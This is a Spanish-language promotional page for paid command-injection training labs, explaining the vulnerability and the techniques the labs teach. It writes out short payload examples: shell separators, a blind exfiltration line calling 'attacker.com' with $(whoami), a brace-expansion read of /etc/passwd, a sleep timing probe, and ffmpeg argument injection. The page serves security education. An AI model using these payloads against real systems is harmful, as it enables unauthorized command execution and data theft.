Nuevos labs cada semana — Accede a todos desde 5€/mes
Ver labs →Labs de Command Injection
OS Command Injection
¿Qué es Command Injection?
La Command Injection ocurre cuando entrada del usuario se concatena en una llamada a shell del sistema operativo. Permite ejecutar comandos arbitrarios con los privilegios del proceso web — habitualmente RCE inmediata y comprometer toda la máquina.
¿Por qué practicar Command Injection?
Es una de las pocas vulnerabilidades que da RCE directa sin chains complejas. Aparece en features de export (PDF generators, image conversion via ffmpeg/imagemagick), tools admin (ping/whois/traceroute) y wrappers de scripts shell. Bounties: P1 inmediato, $5,000-$50,000.
¿Qué aprenderás con los labs de Command Injection?
Aprenderás separadores que pasan filtros débiles (`;` `&&` `||` `|` `$()` backticks), técnicas blind con DNS callback (curl `attacker.com/$(whoami)`), exfil via timing y bypass de blacklists con bash brace expansion ({c,a,t} /etc/passwd).
Tipos de Command Injection que cubrimos
- In-band
El output del comando se devuelve en la respuesta HTTP. El más fácil de detectar (probar `id` y ver `uid=33(www-data)`).
- Blind
Sin output visible. Detectas con sleep / DNS callback / file write. Confirmas con `; sleep 10` y comparas latencia.
- Argument injection
El parámetro va a un comando como argumento (ej. ffmpeg -i FILE). Inyectar `--config /tmp/x` o `-y -filter_complex ...` para abusar del binario.
Cargando labs...
Ver en catálogo completo →Otras categorías relacionadas
Empieza con labs de Command Injection
Practica OS Command Injection con labs basados en reportes reales. En español. Desde 5€/mes.
Empieza con el primer lab de Command Injection